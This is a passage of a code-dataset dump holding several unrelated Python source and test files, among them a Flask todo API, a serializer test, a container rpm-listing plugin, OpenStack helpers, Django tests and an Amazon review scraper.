1:Ysize[2],\r\n 2:Ysize[1],\r\n 3:Ysize[1]-Ysize[3],\r\n 4:Ysize[2],\r\n 5:Ysize[2]+Ysize[4],\r\n 6:Ysize[1]-Ysize[3],\r\n 7:Ysize[2]+Ysize[4]\r\n}\r\nfor i in range(NUM_TURN):\r\n print(\"{\",Xcor[i], \",\", Ycor[i],\"}\")\r\n NewImage = Image0.copy()\r\nfor i in range(1,NUM_TURN):\r\n NewImage = NewImage.resize((Xsize[i],Ysize[i]))\r\n Image0.paste(NewImage.rotate(i*90,expand=True),(Xcor[i],Ycor[i]))\r\nImage0.show()","sub_path":"Spyral/ImageArchimed.py","file_name":"ImageArchimed.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"159523522","text":"import numpy as np\nimport unittest\nfrom yggdrasil.serialize import DefaultSerialize\nfrom yggdrasil.serialize.tests import test_SerializeBase as parent\n\n\nclass TestFunctionalSerialize(parent.TestSerializeBase):\n r\"\"\"Test class for FunctionalSerialize.\"\"\"\n\n _cls = 'FunctionalSerialize'\n testing_option_kws = {'as_format': True}\n \n def __init__(self, *args, **kwargs):\n super(TestFunctionalSerialize, self).__init__(*args, **kwargs)\n self.func_serialize = self._func_serialize\n self.func_deserialize = self._func_deserialize\n\n def get_options(self):\n r\"\"\"Get testing options.\"\"\"\n out = {'kwargs': {'func_serialize': self.func_serialize,\n 'func_deserialize': self.func_deserialize},\n 'empty': b'',\n 'objects': [['one', np.int32(1), 1.0],\n ['two', np.int32(2), 1.0]],\n 'extra_kwargs': {},\n 'typedef': {'type': 'bytes'},\n 'dtype': None,\n 'is_user_defined': True}\n return out\n \n def _func_serialize(self, args): # pragma: no cover\n r\"\"\"Method that serializes using repr.\"\"\"\n return repr(args).encode(\"utf-8\")\n\n def _func_deserialize(self, args): # pragma: no cover\n r\"\"\"Method that deserializes using eval.\"\"\"\n if len(args) == 0:\n return self.testing_options['empty']\n x = eval(args.decode(\"utf-8\"))\n return x\n\n def test_serialize_sinfo(self):\n r\"\"\"Test serialize/deserialize with serializer info.\"\"\"\n self.assert_raises(RuntimeError, self.instance.serialize,\n self.testing_options['objects'][0],\n add_serializer_info=True)\n \n\nclass FakeSerializer(DefaultSerialize.DefaultSerialize):\n r\"\"\"Fake serializer that mocks user defined serialization/deserialization\n routines.\"\"\"\n\n _dont_register = True\n\n def func_serialize(self, args): # pragma: no cover\n r\"\"\"Method that serializes using repr.\"\"\"\n return repr(args).encode(\"utf-8\")\n\n def func_deserialize(self, args): # pragma: no cover\n r\"\"\"Method that deserializes using eval.\"\"\"\n if len(args) == 0:\n return []\n x = eval(args.decode(\"utf-8\"))\n return x\n\n\nclass TestFunctionalSerialize_class(TestFunctionalSerialize):\n r\"\"\"Test class for FunctionalSerialize class with classes.\"\"\"\n\n def get_options(self):\n r\"\"\"Get testing options.\"\"\"\n temp_seri = FakeSerializer()\n assert(issubclass(temp_seri.__class__, DefaultSerialize.DefaultSerialize))\n out = super(TestFunctionalSerialize_class, self).get_options()\n out['kwargs'] = {'func_serialize': temp_seri,\n 'func_deserialize': temp_seri,\n 'encoded_datatype': {'type': 'bytes'}}\n return out\n \n\nclass TestFunctionalSerialize_error(TestFunctionalSerialize):\n r\"\"\"Test class for FunctionalSerialize class with incorrect functions.\"\"\"\n\n def _func_serialize(self, args):\n r\"\"\"Method that serializes using repr.\"\"\"\n return args\n\n def test_serialize(self):\n r\"\"\"Test serialize with function that dosn't return correct type.\"\"\"\n self.assert_raises(TypeError, self.instance.serialize, (1,))\n\n @unittest.skipIf(True, 'Error testing')\n def test_serialize_no_metadata(self):\n r\"\"\"Test serializing without metadata.\"\"\"\n pass # pragma: no cover\n \n @unittest.skipIf(True, 'Error testing')\n def test_serialize_header(self):\n r\"\"\"Disabled: Test serialize/deserialize with header.\"\"\"\n pass # pragma: no cover\n\n @unittest.skipIf(True, 'Error testing')\n def test_serialize_sinfo(self):\n r\"\"\"Disabled: Test serialize/deserialize with serializer info.\"\"\"\n pass # pragma: no cover\n\n @unittest.skipIf(True, 'Error testing')\n def test_field_specs(self):\n r\"\"\"Disabled: Test field specifiers.\"\"\"\n pass # pragma: no cover\n","sub_path":"yggdrasil/serialize/tests/test_FunctionalSerialize.py","file_name":"test_FunctionalSerialize.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"400959736","text":"\"\"\"\nCopyright (c) 2015 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\"\"\"\nimport os\nimport subprocess\nimport tempfile\nimport tarfile\n\nfrom atomic_reactor.plugin import PostBuildPlugin\nfrom atomic_reactor.utils.rpm import rpm_qf_args, parse_rpm_output\nfrom atomic_reactor.plugins.pre_reactor_config import get_list_rpms_from_scratch\nfrom docker.errors import APIError\n\nRPMDB_PATH = '/var/lib/rpm'\nRPMDB_DIR_NAME = 'rpm'\nRPMDB_PACKAGES_NAME = 'Packages'\n\n__all__ = ('PostBuildRPMqaPlugin', )\n\n\nclass PostBuildRPMqaPlugin(PostBuildPlugin):\n key = \"all_rpm_packages\"\n is_allowed_to_fail = False\n sep = ';'\n\n def __init__(self, tasker, workflow, image_id, ignore_autogenerated_gpg_keys=True):\n \"\"\"\n constructor\n\n :param tasker: ContainerTasker instance\n :param workflow: DockerBuildWorkflow instance\n \"\"\"\n # call parent constructor\n super(PostBuildRPMqaPlugin, self).__init__(tasker, workflow)\n self.image_id = image_id\n self.ignore_autogenerated_gpg_keys = ignore_autogenerated_gpg_keys\n\n self._container_ids = []\n\n def run(self):\n # If another component has already filled in the image component list, skip\n if self.workflow.image_components is not None:\n return None\n\n if self.workflow.builder.dockerfile_images.base_from_scratch:\n if get_list_rpms_from_scratch(self.workflow):\n self.log.info(\"from scratch, list_rpms_from_scratch is True, trying get rpmdb\")\n plugin_output = self.gather_output_scratch()\n if not plugin_output:\n self.tasker.cleanup_containers(*self._container_ids)\n return None\n else:\n self.log.info(\"from scratch, but list_rpms_from_scratch is False, won't run rpmqa\")\n return None\n else:\n plugin_output = self.gather_output_non_scratch()\n\n # gpg-pubkey are autogenerated packages by rpm when you import a gpg key\n # these are of course not signed, let's ignore those by default\n if self.ignore_autogenerated_gpg_keys:\n self.log.debug(\"ignore rpms 'gpg-pubkey'\")\n plugin_output = [x for x in plugin_output if not x.startswith(\"gpg-pubkey\" + self.sep)]\n\n self.tasker.cleanup_containers(*self._container_ids)\n\n self.workflow.image_components = parse_rpm_output(plugin_output)\n\n return plugin_output\n\n def gather_output_non_scratch(self):\n for _ in range(5):\n container_id = self.tasker.run(\n self.image_id,\n command=rpm_qf_args(),\n create_kwargs={\"entrypoint\": \"/bin/rpm\", \"user\": \"root\"},\n start_kwargs={},\n )\n self._container_ids.append(container_id)\n self.tasker.wait(container_id)\n output = self.tasker.logs(container_id, stream=False)\n\n if output:\n return output\n\n raise RuntimeError('Unable to gather list of installed packages in container')\n\n def gather_output_scratch(self):\n container_dict = self.tasker.create_container(self.image_id, command=['/bin/bash'])\n container_id = container_dict['Id']\n self._container_ids.append(container_id)\n\n try:\n bits, _ = self.tasker.get_archive(container_id, RPMDB_PATH)\n except APIError as ex:\n self.log.info('Could not extract rpmdb in %s : %s', RPMDB_PATH, ex)\n return None\n except Exception as ex:\n self.log.info('Get archive failed while extracting rpmdb in %s : %s', RPMDB_PATH, ex)\n raise RuntimeError(ex) from ex\n\n with tempfile.NamedTemporaryFile() as rpmdb_archive:\n for chunk in bits:\n rpmdb_archive.write(chunk)\n rpmdb_archive.flush()\n tar_archive = tarfile.TarFile(rpmdb_archive.name)\n\n with tempfile.TemporaryDirectory() as rpmdb_dir:\n tar_archive.extractall(rpmdb_dir)\n\n rpmdb_path = os.path.join(rpmdb_dir, RPMDB_DIR_NAME)\n rpmdb_packages = os.path.join(rpmdb_path, RPMDB_PACKAGES_NAME)\n\n if not os.path.exists(rpmdb_packages):\n self.log.info('%s does not exist in rpmdb', RPMDB_PACKAGES_NAME)\n return None\n\n rpm_cmd = 'rpm --dbpath {} {}'.format(rpmdb_path, rpm_qf_args())\n try:\n self.log.info('getting rpms from rpmdb: %s', rpm_cmd)\n rpm_output = subprocess.check_output(rpm_cmd,\n shell=True, universal_newlines=True) # nosec\n except Exception as e:\n self.log.error(\"Failed to get rpms from rpmdb: %s\", e)\n raise e\n\n rpm_output = [line for line in rpm_output.splitlines() if line]\n return rpm_output\n","sub_path":"atomic_reactor/plugins/post_rpmqa.py","file_name":"post_rpmqa.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471922453","text":"import bisect\nimport random\nfrom itertools import accumulate\n\n\nclass Solution:\n def __init__(self, rects):\n self.a = [(x2 - x1 + 1) * (y2 - y1 + 1) for x1, y1, x2, y2 in rects]\n self.a = [i / sum(self.a) for i in accumulate(self.a)]\n self.r = rects\n\n def pick(self):\n d = random.random()\n t = bisect.bisect_left(self.a, d)\n x1, y1, x2, y2 = self.r[t]\n return random.randint(x1, x2), random.randint(y1, y2)\n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(rects)\n# param_1 = obj.pick()\n\nif __name__ == '__main__':\n o = Solution([[-2, -2, -1, -1], [1, 0, 3, 0]])\n print(o.pick())\n print(o.pick())\n print(o.pick())\n print(o.pick())\n","sub_path":"src/leetcode/P497.py","file_name":"P497.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"404753630","text":"from flask import Blueprint, jsonify, request, Response\n\nfrom project import db\nfrom project.api.models import Todo, User\n\n\ntodo_blueprint = Blueprint(\n \"todos\",\n __name__\n)\n\n\n@todo_blueprint.route(\"/api/todos\")\ndef get_todos():\n response = []\n todos = db.session.query(Todo).all()\n for todo in todos:\n response.append(todo.to_dict())\n return jsonify(response)\n\n\n@todo_blueprint.route(\"/api/todos/\")\ndef get_todo(todo_id):\n todo = Todo.query.filter_by(todo_id=todo_id).first()\n if not todo:\n return Response(status=404)\n return jsonify(todo.to_dict())\n\n\n@todo_blueprint.route(\"/api/todos/\", methods=[\"DELETE\"])\ndef delete_todo(todo_id):\n todo = Todo.query.filter_by(todo_id=todo_id).first()\n if not todo:\n return Response(status=404)\n db.session.delete(todo)\n db.session.commit()\n return Response(status=204)\n\n\n@todo_blueprint.route(\"/api/todos\", methods=[\"POST\", \"PUT\"])\ndef create_or_update_todo():\n response = {}\n request_json = request.get_json()\n\n import sys\n print(\"request data...\", request_json, file=sys.stderr)\n\n # Validation\n keys = [\"title\", \"content\", \"completed\", \"dueDate\", \"priority\"]\n if request.method == \"PUT\":\n keys.append(\"todoId\")\n for key in keys:\n if key not in request_json:\n response[\"message\"] = \"Missing {key} in request body\".format(key=key)\n return jsonify(response), 400\n\n user_id = request_json.get(\"userId\")\n if user_id:\n user = User.query.filter_by(user_id=user_id).first()\n if not user:\n response[\"message\"] = \"User not found\"\n return jsonify(response), 404\n\n # Parse the request data\n todo = None\n if request.method == \"POST\":\n todo = Todo()\n elif request.method == \"PUT\":\n todo_id = int(request_json[\"todoId\"])\n todo = Todo.query.filter_by(todo_id=todo_id).first()\n if not todo:\n response[\"message\"] = \"Todo not found\"\n return jsonify(response), 404\n\n todo.title = request_json[\"title\"]\n todo.content = request_json[\"content\"]\n todo.completed = request_json[\"completed\"]\n todo.due_date = request_json[\"dueDate\"]\n todo.priority = request_json[\"priority\"]\n if \"userId\" in request_json:\n todo.user_id = user_id\n\n if request.method == \"POST\":\n db.session.add(todo)\n response[\"message\"] = \"Todo created successfully\"\n elif request.method == \"PUT\":\n response[\"message\"] = \"Todo updated successfully\"\n db.session.commit()\n response[\"todoId\"] = todo.todo_id\n\n return jsonify(response), 201\n","sub_path":"server/project/api/todo_routes.py","file_name":"todo_routes.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"569906708","text":"import ast\nimport logging\nfrom pprint import pformat\n\nimport demisto_client\n\n\ndef update_server_configuration(client, server_configuration, error_msg):\n \"\"\"updates server configuration\n\n Args:\n client (demisto_client): The configured client to use.\n server_configuration (dict): The server configuration to be added\n error_msg (str): The error message\n\n Returns:\n response_data: The response data\n status_code: The response status code\n \"\"\"\n logging.debug(f'Updating server configurations with {pformat(server_configuration)}')\n system_conf_response = demisto_client.generic_request_func(\n self=client,\n path='/system/config',\n method='GET'\n )\n system_conf = ast.literal_eval(system_conf_response[0]).get('sysConf', {})\n logging.debug(f'Current server configurations are {pformat(system_conf)}')\n system_conf.update(server_configuration)\n data = {\n 'data': system_conf,\n 'version': -1\n }\n response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/system/config',\n method='POST', body=data)\n\n try:\n result_object = ast.literal_eval(response_data)\n logging.debug(f'Updated server configurations with response: {pformat(result_object)}')\n except ValueError as err:\n logging.exception('failed to parse response from demisto. response is {}.\\nError:\\n{}'.format(response_data, err))\n return\n\n if status_code >= 300 or status_code < 200:\n message = result_object.get('message', '')\n logging.error(f'{error_msg} {status_code}\\n{message}')\n return response_data, status_code\n","sub_path":"Tests/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"415079272","text":"from pyramid.view import view_config\n\nfrom pyramid.httpexceptions import (\n HTTPFound\n)\n\nfrom .auth import restrict_access\nfrom .. import models\n\n\n@view_config(\n route_name='admin_team',\n renderer='../templates/event.jinja2',\n request_method=\"POST\"\n)\n@restrict_access()\ndef admin_team_edit(request):\n\n if 'form.submitted' in request.params:\n team_id = request.params['id']\n member = request.params['member']\n team = request.dbsession.query(models.Team).get(team_id)\n action = request.params['form.submitted']\n if action == \"add\":\n team_list = list(team.winners)\n team_list.append(member)\n team.winners = team_list\n if action == \"remove\":\n team_list = list(team.winners)\n team_list.remove(member)\n team.winners = team_list\n\n return HTTPFound(\n location=request.route_url('event', id=request.params['event_id'])\n )\n","sub_path":"pubg_project/views/admin_team.py","file_name":"admin_team.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"490978028","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\n\nimport time\nfrom tests import *\n\n# 获取account0,作为测试账号\nprint(u'\\n\\n查询accounts...')\naccounts = utils.accounts()\naccount0 = accounts[0]\nprint(u'accounts地址: ', accounts)\n\n# 部署管理合约\nstatus_mgmt, mgmt_contract_address = utils.deploy_mgmt_contract(account0)\n# 部署管理合约完成\n\n# 部署升级合约\nstatus, logic_contract_address = utils.deploy_logic_contract(account0)\n# 部署升级合约完成\n\n\n#######\nprint(u'\\n\\n发起设置升级合约地址请求...')\nnew_address = logic_contract_address[3:]\nmgmt.send_request(mgmt_contract_address, account0, new_address);\n#######\n\n\nprint(u'\\n\\n\\n====================================测试开始====================================')\n# 投票\nprint(u'\\n\\n管理合约己过期,再发起投票请求...')\ntime.sleep(1 * 60)\nmgmt.vote(mgmt_contract_address, account0);\n#######\n","sub_path":"tests/test_mgmt_vote_expired.py","file_name":"test_mgmt_vote_expired.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"16055937","text":"import inspect\nfrom contextvars import ContextVar\nfrom enum import Enum\nfrom fnmatch import fnmatch\nfrom typing import Any, Callable, Dict, List, Mapping, Optional, Tuple\nfrom urllib.parse import ParseResult, urlparse\n\nfrom fastapi.routing import APIRouter\nfrom httpx import URL\nfrom pydantic import AnyHttpUrl\nfrom pydantic.errors import UrlHostError\nfrom starlette.datastructures import Headers, MutableHeaders\n\nfrom .cache import endpoint_cache\nfrom .net import AsyncHTTPClient\n\n\ndef exclude_params(func: Callable, params: Mapping[str, Any]) -> Dict[str, Any]:\n func_params = inspect.signature(func).parameters\n return {k: v for k, v in params.items() if k in func_params}\n\n\nclass SlashRouter(APIRouter):\n def api_route(self, path: str, **kwargs):\n path = path if path.startswith(\"/\") else (\"/\" + path)\n return super().api_route(path, **kwargs)\n\n\nclass EndpointMeta(type):\n def __new__(cls, name: str, bases: Tuple[type, ...], namespace: Dict[str, Any]):\n for name, func in namespace.items():\n if name.startswith(\"_\") or not inspect.iscoroutinefunction(func):\n continue\n namespace[name] = endpoint_cache(func)\n return super().__new__(cls, name, bases, namespace)\n\n\nclass BaseEndpoint(metaclass=EndpointMeta):\n def __init__(self, client: AsyncHTTPClient):\n self.client = client\n\n @staticmethod\n def _join(base: str, endpoint: str, params: Dict[str, Any]) -> URL:\n host: ParseResult = urlparse(base)\n params = {\n k: (v.value if isinstance(v, Enum) else v)\n for k, v in params.items()\n if v is not None\n }\n return URL(\n url=ParseResult(\n scheme=host.scheme,\n netloc=host.netloc,\n path=endpoint.format(**params),\n params=\"\",\n query=\"\",\n fragment=\"\",\n ).geturl(),\n params=params,\n )\n\n\nclass BaseHostUrl(AnyHttpUrl):\n allowed_hosts: List[str] = []\n\n @classmethod\n def validate_host(\n cls, parts: Dict[str, str]\n ) -> Tuple[str, Optional[str], str, bool]:\n host, tld, host_type, rebuild = super().validate_host(parts)\n if not cls._check_domain(host):\n raise UrlHostError(allowed=cls.allowed_hosts)\n return host, tld, host_type, rebuild\n\n @classmethod\n def _check_domain(cls, host: str) -> bool:\n return any(\n filter(\n lambda x: fnmatch(host, x), # type:ignore\n cls.allowed_hosts,\n )\n )\n\n\nrequest_headers = ContextVar(\"request_headers\", default=Headers())\nresponse_headers = ContextVar(\"response_headers\", default=MutableHeaders())\n","sub_path":"hibiapi/utils/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"127377552","text":"# coding=utf-8\n\"\"\"OpenStack utilities\"\"\"\n# Absolute import required on Python 2 to avoid collision\n# of this module with openstack-sdk package\nfrom __future__ import absolute_import\n\nfrom contextlib import contextmanager\n\nimport keystoneauth1.exceptions.http as keystoneauth_exceptions\nfrom openstack.exceptions import SDKException\nfrom openstack.connection import Connection\n\nfrom apyfal.exceptions import AcceleratorException\n\n\nclass ExceptionHandler:\n \"\"\"Handler for OpenStack exceptions.\"\"\"\n # Needs to be overridden with exceptions to re-raises\n RUNTIME = AcceleratorException\n AUTHENTICATION = AcceleratorException\n\n @classmethod\n @contextmanager\n def catch(cls, to_catch=SDKException, to_raise=None, ignore=False, **exc_kwargs):\n \"\"\"\n Context manager that catch OpenStack exceptions and raises\n Apyfal exceptions.\n\n Args:\n to_catch (Exception or tuple of Exception): Exception to catch.\n SDKException if not specified.\n to_raise (apyfal.exception.AcceleratorException subclass):\n Exception to raise. self.RUNTIME if not specified.\n ignore (bool): If True, don't raises exception.\n exc_kwargs: Exception to raise arguments.\n \"\"\"\n # Performs operation\n try:\n yield\n\n # Catch authentication exceptions\n except keystoneauth_exceptions.Unauthorized as exception:\n raise cls.AUTHENTICATION(exc=exception)\n\n # Catch specified exceptions\n except to_catch as exception:\n # Raises Apyfal exception\n if not ignore:\n raise (to_raise or cls.RUNTIME)(exc=exception, **exc_kwargs)\n\n\ndef connect(region, auth_url, client_id, secret_id, project_id, interface):\n \"\"\"\n Connect to OpenStack.\n\n Args:\n region (str): OpenStack region.\n auth_url (str): OpenStack auth_url.\n client_id (str): OpenStack client ID.\n secret_id (str): OpenStack secret ID.\n project_id (str): OpenStack project ID.\n interface (str): OpenStack interface.\n\n Returns:\n Connection: OpenStack connection.\n \"\"\"\n return Connection(\n region_name=region,\n auth=dict(\n auth_url=auth_url, username=client_id,\n password=secret_id, project_id=project_id),\n compute_api_version='2', identity_interface=interface)\n","sub_path":"apyfal/_utilities/openstack.py","file_name":"openstack.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29062329","text":"import json\nfrom django.test import TestCase\nfrom django.test.client import Client\nfrom django.core.urlresolvers import reverse\n\nfrom common.models import *\nfrom common.views import *\n\nclass ModelTestCase(TestCase):\n fixtures = ['test_common.yaml']\n\n def testQuestBasics(self):\n # unsolved quest\n q = Quest.objects.get(pk=1)\n self.assertFalse(q.check_all_solved())\n self.assertEqual(q.questtask_set.count(), 3)\n self.assertEqual(q.questtask_set.filter(solved=True).count(), 1)\n \n # answer all questions\n for qt in q.questtask_set.all():\n qt.solved = True\n qt.save()\n \n # check that quest is now solved\n self.assertEqual(q.questtask_set.filter(solved=True).count(), 3)\n self.assertTrue(q.check_all_solved())\n \n def testQuestTaskBasics(self):\n qt = QuestTask.objects.get(pk=1)\n self.assertEqual(qt.incorrect_answers().count(), 0)\n\n for i in range(3):\n answer = GuessAttempt(quest_task = qt, answer = str(i), host = '127.0.0.1')\n answer.save()\n \n self.assertEqual(qt.incorrect_answers().count(), 3)\n \n\nclass ViewTestCase(TestCase):\n fixtures = ['test_common.yaml']\n \n def testHome(self):\n \"\"\"Check that home page contains all quests\"\"\"\n response = self.client.get(reverse('home'))\n for q in Quest.objects.all():\n self.assertContains(response, q.summary)\n\n def testQuestShow(self):\n \"\"\"Check that quest page contains all quest questions\"\"\"\n q = Quest.objects.get(pk=1)\n response = self.client.get(reverse('quest_show', kwargs={'quest_id': q.id}))\n \n # check that page contains quest summary and description but not answer\n self.assertContains(response, q.summary)\n self.assertContains(response, q.description)\n self.assertNotContains(response, q.answer)\n \n # check for all questions\n for qt in q.questtask_set.all():\n self.assertContains(response, qt.question)\n \n # answer all questions\n for qt in q.questtask_set.all():\n qt.solved = True\n qt.save()\n\n # check that quest is now solved\n self.assertTrue(q.check_all_solved())\n\n # check that all questions are still on the page\n response = self.client.get(reverse('quest_show', kwargs={'quest_id': q.id}))\n self.assertContains(response, qt.question)\n self.assertContains(response, qt.answer)\n\n\n\n def testAnswerIsWrong(self):\n \"\"\"Check for invalid input submitted as answer to quest tasks\"\"\"\n # no guess attempts yet\n self.assertEqual(GuessAttempt.objects.count(), 0)\n \n # check various invalid inputs\n test_cases = [\n # invalid data\n ({},\n {'error': ERR_INVALID_DATA}, 0),\n ({'id': 1},\n {'error': ERR_INVALID_DATA}, 0),\n ({'id': 1, 'wrongfield': 'somedata'},\n {'error': ERR_INVALID_DATA}, 0),\n ({'answer': 'valid'},\n {'error': ERR_INVALID_DATA}, 0),\n ({'id': -1, 'answer': 'valid'},\n {'error': ERR_INVALID_DATA}, 0),\n ({'id': 999, 'answer': 'valid'},\n {'error': ERR_NO_QUESTION}, 0),\n ({'id': 1, 'answer': ' \\n\\t\\n '},\n {'error': ERR_INVALID_DATA}, 0),\n ({'id': 1, 'answer': ' '},\n {'error': ERR_INVALID_DATA}, 0),\n ({'id': 2, 'answer': 'sometext'},\n {'error': ERR_QUESTION_SOLVED}, 0),\n\n # valid, but wrong\n ({'id': 1, 'answer': '123'},\n {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': False}, 'answers': ['123']}, 1),\n ({'id': 1, 'answer': ' 456\\n '},\n {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': False}, 'answers': ['456', '123']}, 2),\n ({'id': 1, 'answer': ' \" \\' '},\n {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': False}, 'answers': ['\" \\'', '456', '123']}, 3),\n ({'id': 1, 'answer': ''},\n {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': False}, 'answers': ['<a>', '\" \\'', '456', '123']}, 4),\n ]\n \n for test_case in test_cases:\n data, expected, expected_ga_count = test_case\n\n # submit data\n response = self.client.post(reverse('submit_answer'), data)\n self.assertEqual(response.status_code, 200)\n \n # check response\n results = json.loads(response.content)\n self.assertEqual(results, expected)\n \n # check number of GuessAttempt in database\n self.assertEqual(GuessAttempt.objects.count(), expected_ga_count)\n \n \n def testAnswerIsCorrect(self):\n \"\"\"Check for valid but incorrect answers to quest tasks\"\"\"\n # no guess attempts yet\n self.assertEqual(GuessAttempt.objects.count(), 0)\n\n # check correct answers in answer form\n test_cases = [\n ({'id': 1, 'answer': 'aaa'},\n {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': True, 'answer': 'aaa'}, 'answers': []}, 1),\n ({'id': 1, 'answer': 'AAA'},\n {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': True, 'answer': 'aaa'}, 'answers': []}, 2),\n ({'id': 1, 'answer': ' \\naAa \\t\\n'},\n {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': True, 'answer': 'aaa'}, 'answers': []}, 3),\n ]\n \n for i, test_case in enumerate(test_cases):\n data, expected, expected_ga_count = test_case\n \n # reset question\n qt = QuestTask.objects.get(pk=data['id'])\n qt.solved = False\n qt.solved_at = None\n qt.save()\n \n # submit data\n response = self.client.post(reverse('submit_answer'), data)\n self.assertEqual(response.status_code, 200)\n \n # check response\n results = json.loads(response.content)\n self.assertEqual(results, expected)\n \n # check number of GuessAttempt in database\n self.assertEqual(GuessAttempt.objects.count(), expected_ga_count)\n\n # check that valid, but incorrect input input does not solve the question\n qt = QuestTask.objects.get(pk=data['id'])\n self.assertTrue(qt.solved)\n self.assertIsNotNone(qt.solved_at)\n \n\n def testAnswerAllQuestions(self):\n \"\"\"Check for valid but incorrect answers to quest tasks\"\"\"\n\n # check correct answers in answer form\n test_cases = [\n ({'id': 4, 'answer': 'four'},\n {'q': {'id': 2, 'solved': False},\n 'qt': {'id': 4, 'solved': True, 'answer': 'four'},\n 'answers': []},\n 1),\n ({'id': 5, 'answer': 'Earth'},\n {'q': {'id': 2, 'solved': True, 'answer': 'cookies everybody'},\n 'qt': {'id': 5, 'solved': True, 'answer': 'earth'},\n 'answers': []},\n 2),\n ]\n \n for i, test_case in enumerate(test_cases):\n data, expected, expected_ga_count = test_case\n \n # submit data\n response = self.client.post(reverse('submit_answer'), data)\n self.assertEqual(response.status_code, 200)\n \n # check response\n results = json.loads(response.content)\n self.assertEqual(results, expected)\n \n # check number of GuessAttempt in database\n self.assertEqual(GuessAttempt.objects.count(), expected_ga_count)\n\n","sub_path":"coolerquest/common/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"466886704","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nimport heapq\n\nclass Solution(object):\n def getAllElements(self, root1, root2):\n \"\"\"\n :type root1: TreeNode\n :type root2: TreeNode\n :rtype: List[int]\n \"\"\"\n \n self.res = []\n self.value_pq = []\n \n self.inorder(root1)\n self.inorder(root2)\n \n while self.value_pq:\n self.res.append(heapq.heappop(self.value_pq))\n \n return self.res\n \n def inorder(self, root):\n if not root:\n \n return \n \n self.inorder(root.left)\n heapq.heappush(self.value_pq, root.val)\n self.inorder(root.right)","sub_path":"practice/solution/1305_all_elements_in_two_binary_search_trees.py","file_name":"1305_all_elements_in_two_binary_search_trees.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"596974606","text":"import scrapy\nfrom bs4 import BeautifulSoup\nimport re\nfrom amzproduct.items import ReviewItem\nfrom scrapy.spiders import CSVFeedSpider\nfrom scrapy.http import Request\nfrom scrapy.utils.project import get_project_settings\n# CSVFeedSpider\nclass ReviewSpider(CSVFeedSpider):\n name = 'reviewSpider'\n allowed_domains = [\"amazon.com\"]\n custom_settings = {\n 'LOG_LEVEL': 'ERROR',\n 'LOG_ENABLED': True,\n 'LOG_STDOUT': True\n }\n # start from the first page of search result\n start_urls = ['https://www.amazon.ca/s?k=table+lamp&qid=1584766372&ref=sr_pg_1']\n\n def __init__(self):\n self.declare_path()\n # self.asin = ''\n self.baseUrl = 'https://www.amazon.ca'\n\n \n def declare_path(self):\n \"\"\"Set the XPath of our target items\"\"\"\n self.review_urlXpath = '//*[@id=\"reviews-medley-footer\"]/div[2]/a/@href'\n self.dataCSS = '#cm_cr-review_list'\n self.reviewerCSS = '.a-profile-name'\n self.contentCSS = '.review-text'\n self.titleCSS = '.review-title'\n self.dateCSS = '.review-date'\n self.rateCSS = '.review-rating'\n self.asinXpath = '//*[@id=\"prodDetails\"]/div/div[2]/div[1]/div[2]/div/div/table/tbody/tr/td[starts-with(text(),\"ASIN\")]/../descendant::text()'\n self.asinXpath2 = '//*[@id=\"detail_bullets_id\"]/table/tr/td/div/ul/li/b[starts-with(text(),\"ASIN\")]/../descendant::text()'\n \n\n def parse(self, response):\n \"\"\"Iterate every page of a auction and enter every link of the item\"\"\"\n # lastUrl = ''\n for item_link in response.xpath('//*[@class=\"a-link-normal a-text-normal\"]/@href').extract(): \n url = self.baseUrl + item_link\n yield Request(url=url,callback=self.parse_item, dont_filter=True,meta = {'dont_redirect': True, \"handle_httpstatus_list\" : [301, 302, 303]})\n\n pagination_link = response.css('li.a-last a::attr(href)')[0].extract()\n pagination_url = self.baseUrl + pagination_link\n yield Request(url=pagination_url,callback=self.parse, dont_filter=True)\n\n def parse_item(self,response):\n \"\"\"scrape the asin and review link\"\"\"\n if response.xpath(self.asinXpath).extract()!=[]:\n Asin = response.xpath(self.asinXpath).extract()\n else:\n Asin = response.xpath(self.asinXpath2).extract()\n self.asin = self.cleanText(self.parseText(self.listToStr(Asin)))\n reviewUrl = 